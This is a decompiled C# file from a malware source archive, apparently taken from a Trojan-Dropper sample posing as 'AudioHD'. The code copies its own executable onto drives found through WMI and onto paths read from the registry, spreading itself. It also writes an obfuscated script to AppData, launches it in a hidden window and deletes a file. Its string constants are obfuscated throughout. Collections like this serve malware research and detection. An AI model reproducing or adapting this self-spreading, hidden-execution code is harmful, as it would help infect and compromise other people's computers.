MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000E/_0007.cs

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe

using \u0001;
using \u000E;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Threading;

namespace \u000E
{
  internal sealed class \u0007
  {
    [NonSerialized]
    internal static \u0002 \u0001;
    private static \u0008 \u0001;
    private string \u0001 = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);

    public static void \u000F() => new \u0007().\u0010();

    public void \u0010()
    {
      try
      {
        foreach (ManagementObject managementObject in new ManagementObjectSearcher(\u0007.\u0001(6807)).Get())
        {
          Thread.Sleep(50);
          string str = Convert.ToString(managementObject[\u0007.\u0001(6844)]);
          if (!str.Contains(\u0007.\u0001(1724)))
            File.Copy(this.\u0001, \u0007.\u0001(6853) + Environment.MachineName + \u0007.\u0001(1979) + str + \u0007.\u0001(6858), true);
        }
      }
      catch (Exception ex)
      {
        \u0007.\u0001.\u0010(ex.ToString());
      }
      try
      {
        string name = \u0007.\u0001(6887);
        RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(name);
        foreach (string valueName in registryKey.GetValueNames())
        {
          Thread.Sleep(50);
          string str = registryKey.GetValue(valueName).ToString();
          if (valueName.ToLower() != \u0007.\u0001(6988))
          {
            try
            {
              File.Copy(this.\u0001, str + \u0007.\u0001(7001), true);
            }
            catch (Exception ex)
            {
            }
          }
        }
        registryKey.Close();
      }
      catch (Exception ex)
      {
        \u0007.\u0001.\u0010(ex.ToString());
      }
    }

    public static void \u0011()
    {
      if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0007.\u0001(7030)))
        return;
      StreamWriter streamWriter = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0007.\u0001(7030));
      streamWriter.WriteLine(\u0007.\u0001(7043));
      streamWriter.WriteLine(\u0007.\u0001(7072));
      streamWriter.WriteLine(\u0007.\u0001(7097));
      streamWriter.WriteLine(\u0007.\u0001(7138));
      streamWriter.WriteLine(\u0007.\u0001(7203));
      streamWriter.WriteLine(\u0007.\u0001(7272));
      streamWriter.WriteLine(\u0007.\u0001(7345));
      streamWriter.WriteLine(\u0007.\u0001(7414));
      streamWriter.WriteLine(\u0007.\u0001(7483));
      streamWriter.WriteLine(\u0007.\u0001(7556));
      streamWriter.WriteLine(\u0007.\u0001(7625));
      streamWriter.WriteLine(\u0007.\u0001(7702));
      streamWriter.WriteLine(\u0007.\u0001(7779));
      streamWriter.WriteLine(\u0007.\u0001(1784));
      streamWriter.Close();
      new Process()
      {
        StartInfo = {
          WindowStyle = ProcessWindowStyle.Hidden,
          FileName = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0007.\u0001(7030))
        }
      }.Start();
      try
      {
        File.Delete(Path.Combine(Directory.GetCurrentDirectory(), \u0007.\u0001(7856)));
      }
      catch
      {
      }
    }

    static \u0007()
    {
      \u0003.\u000F();
      \u0007.\u0001 = new \u0008();
    }
  }
}